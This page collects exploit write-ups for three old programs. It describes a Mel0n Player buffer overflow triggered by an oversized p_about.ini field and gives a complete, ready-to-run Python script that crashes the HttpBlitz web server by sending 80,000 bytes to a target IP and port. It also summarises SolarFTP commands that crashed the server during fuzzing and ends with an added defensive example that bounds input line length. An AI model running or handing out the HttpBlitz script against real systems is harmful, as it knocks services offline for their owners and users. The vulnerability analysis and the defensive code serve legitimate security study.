Mel0nPlayer 1.0.11.x Denial of Service POC
Mel0n Player is a well-known program in Indonesia for playing songs provided by the Melon portal (http://www.melon.co.id). It can play many music file types such as mp3, wav, wma, mp4, and others. The player can play files on your local computer or stream them online from the Melon portal. The songs can also be downloaded to your local computer.
The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability when opening the p_about.ini file. (Note: p_about.ini is a configuration file that is part of the skin template. It carries the program information and can be accessed from the menu (Menu → Information).) Adding extra bytes to the Text section of the file triggers the overflow, giving attackers the possibility of arbitrary code execution on a system that has Melon Player installed.
This is just the POC; it will only crash the program.
HttpBlitz Web Server Denial Of Service Exploit
#!/usr/bin/python
# Title: HttpBlitz DOS
# Date: 12/24/2010
# Author: otoy
# Software Link: http://sourceforge.net/projects/httpblitz/files/HttpBlitz.msi/download
# Tested on: Windows XP SP3
#
# ======================================================================
# http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
# say hello to all digital-echidna org crew:
# modpr0be, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
# special thx to offsec, exploit-db, corelan team
#
#### Software description:
# A cross platform Http web server developed using C++. Agile methodology
# with emphasis on :- 1. Good Design 2. Object Oriented Programming 3.
# Refactoring 4. Static/Dynamic Analysis, Unit-testing, Code Coverage 5.
# Software Engineering best practices.
#
#### DOS information:
# you just have to send long string, and it will crash the program.
# just scan the port using nmap will crash the program too.

import socket, sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
junk = "\x41" * 80000

def banner():
    print "\nHttpBlitz DOS."
    print "By: otoy (otoy[at]digital-echidna[dot]org)\n"

# Expect exactly two arguments: target IP and port.
if len(sys.argv) != 3:
    banner()
    print "Usage: %s <ip> <port>\n" % sys.argv[0]
    sys.exit(0)

try:
    s.connect((sys.argv[1], int(sys.argv[2])))
except:
    print "Can't connect to server!\n"
    sys.exit(0)

s.send(junk + '\r\n')
s.close()
SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
SolarFTP Server 2.0 is prone to a denial of service condition because it fails to properly sanitize user-supplied input. With a specially crafted ‘USER’, ‘APPE’, ‘GET’, ‘PUT’, or ‘NLST’ command, a remote attacker can potentially disable the FTP service.
Solar FTP Server is a handy and easy to use personal FTP server with features like virtual directories, simple and intuitive user interface, real-time activity monitoring and management.
Testing and Fuzzing
Using Very Simple FTP Fuzzer, we tested the FTP server with various commands. The first command that we sent was APPE (append). The Windows exception handler popped up, which verified that the server may be vulnerable to some commands.
Unfortunately, the junk that we sent did not overwrite the SEH or the EIP. It just ended in a denial of service. In conclusion, there are 4 commands which make the server crash: APPE, NLST, PUT, and GET.
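Both the HttpBlitz and SolarFTP crashes above come from a server accepting unbounded input on a line-based protocol, so the following added example (not code from the original posts or from either project) shows a bounded line reader and per-command argument check a defender could put in front of such a service. The limits MAX_LINE and MAX_ARG, the function names, and the sample session are assumptions made for illustration, as is the premise that the crafted commands carry oversized arguments.

```python
import io

MAX_LINE = 512   # assumed cap on one control-channel line, in bytes
MAX_ARG = 255    # assumed cap on a command argument, in bytes
WATCHED = {"USER", "APPE", "GET", "PUT", "NLST"}  # commands named in the post


class LineTooLong(Exception):
    """Raised when a peer sends more than the limit without a newline."""


def read_line(stream, limit=MAX_LINE):
    """Return one line without its CRLF/LF, or None at end of stream.

    Bytes are consumed one at a time, so an 80000-byte line is rejected
    after limit+1 bytes instead of being buffered whole.
    """
    buf = bytearray()
    while True:
        byte = stream.read(1)
        if not byte:
            return bytes(buf) if buf else None
        if byte == b"\n":
            return bytes(buf).rstrip(b"\r")
        buf += byte
        if len(buf) > limit:
            raise LineTooLong("line exceeds %d bytes" % limit)


def check_session(raw):
    """Classify each command in a captured control-channel byte string.

    Returns (verb, verdict, named_in_post) tuples.
    """
    stream, verdicts = io.BytesIO(raw), []
    while True:
        try:
            line = read_line(stream)
        except LineTooLong:
            verdicts.append(("?", "drop-connection", False))
            break  # a real server would close the socket here
        if line is None:
            break
        verb, _, arg = line.partition(b" ")
        name = verb.decode("ascii", "replace").upper()
        verdict = "reject" if len(arg) > MAX_ARG else "accept"
        verdicts.append((name, verdict, name in WATCHED))
    return verdicts


# Constructed sample session (not a capture from the page).
SAMPLE = b"USER demo\r\nNLST " + b"A" * 300 + b"\r\nAPPE " + b"A" * 80000 + b"\r\n"
```
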